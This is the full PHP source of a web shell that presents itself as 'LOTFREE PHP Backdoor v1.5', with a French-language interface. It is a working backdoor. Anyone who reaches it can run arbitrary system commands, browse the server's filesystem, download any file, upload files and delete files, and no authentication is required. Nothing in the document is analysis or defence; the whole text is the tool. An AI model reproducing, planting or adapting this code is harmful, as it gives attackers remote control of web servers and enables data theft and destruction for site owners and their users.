<?php function good_link($link) { $link=ereg_replace("/+","/",$link); $link=ereg_replace("/[^/(..)]+/\.\.","/",$link); $link=ereg_replace("/+","/",$link); if(!strncmp($link,"./",2) && strlen($link)>2)$link=substr($link,2); if($link=="")$link="."; return $link; } $dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:"."; $dir=good_link($dir); $rep=opendir($dir); chdir($dir); if(isset($_REQUEST["down"]) && $_REQUEST["down"]!="") { header("Content-Type: application/octet-stream"); header("Content-Length: ".filesize($_REQUEST["down"])); header("Content-Disposition: attachment; filename=".basename($_REQUEST["down"])); readfile($_REQUEST["down"]); exit(); } ?> <html> <head><title>LOTFREE PHP Backdoor v1.5</title></head> <body> <br> <?php echo "Actuellement dans <b>".getcwd()."</b><br>\n"; echo "<b>dir = '$dir'</b><br>\n"; echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez sur une croix pour effacer un fichier !<br><br>\n"; if(isset($_REQUEST['cmd']) && $_REQUEST['cmd']!="") { echo "<pre>\n"; system($_REQUEST['cmd']); echo "</pre>\n"; } if(isset($_FILES["fic"]["name"]) && isset($_POST["MAX_FILE_SIZE"])) { if($_FILES["fic"]["size"]<$_POST["MAX_FILE_SIZE"]) { if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FILES["fic"]["name"]))) { echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["name"])."!<br>\n"; } else echo "upload failed: ".$_FILES["fic"]["error"]."<br>\n"; } else echo "fichier trop gros!<br>\n"; } if(isset($_REQUEST['rm']) && $_REQUEST['rm']!="") { if(unlink($_REQUEST['rm']))echo "fichier ".$_REQUEST['rm']." efface !<br>\n"; else echo "Impossible de supprimer le fichier<br>\n"; } ?> <hr> <table align="center" width="95%" border="0" cellspacing="0" bgcolor="lightblue"> <?php $t_dir=array(); $t_file=array(); $i_dir=0; $i_file=0; while($x=readdir($rep)) { if(is_dir($x))$t_dir[$i_dir++]=$x; else $t_file[$i_file++]=$x; } closedir($rep); while(1) { ?> <tr> <td width="20%" bgcolor="lightgray" valign="top"> <?php if($x=each($t_dir)) { $name=$x["value"]; if($name=='.'){} elseif($name=='..') echo " <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/../")."'>UP</a><br><br>\n"; else echo " <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/$name")."'>".$name."</a>\n"; } ?> </td> <td width='78%'<?php if($y=each($t_file)) { if($y["key"]%2==0)echo " bgcolor='lightgreen'>\n"; else echo ">\n"; echo " <a href='".$_SERVER['PHP_SELF']."?dir=$dir&down=".$y["value"]."'>".$y["value"]."</a>\n"; } else echo ">\n"; ?> </td> <td valign='center' width='2%'<?php if($y) { if($y["key"]%2==0)echo " bgcolor='lightgreen'"; echo "><a href='".$_SERVER['PHP_SELF']."?dir=$dir&rm=".$y["value"]."'><b>X</b></a>"; } else echo ">\n"; ?></td> </tr> <?php if(!$x && !$y)break; } ?> </table> <hr> <br> <a href="<?php echo $_SERVER['PHP_SELF']; ?>?dir=">revenir au repertoire d'origine</a><br><br> <form method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>"> Executer une commande <input type="text" name="cmd"> <input type="submit" value="g0!"> </form><br> Uploader un fichier dans le repertoire courant :<br> <form enctype="multipart/form-data" method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>"> <input type="file" name="fic"><input type="hidden" name="MAX_FILE_SIZE" value="100000"> <input type="submit" value="upl0ad!"></form><br> <br> <center> PHP Backdoor Version 1.5<br> by sirius_black / LOTFREE TEAM<br> Execute commands, browse the filesystem<br> Upload, download and delete files...<br> <a href="http://www.lsdp.net/~lotfree">http://www.lsdp.net/~lotfree</a><br> </center> </body> </html>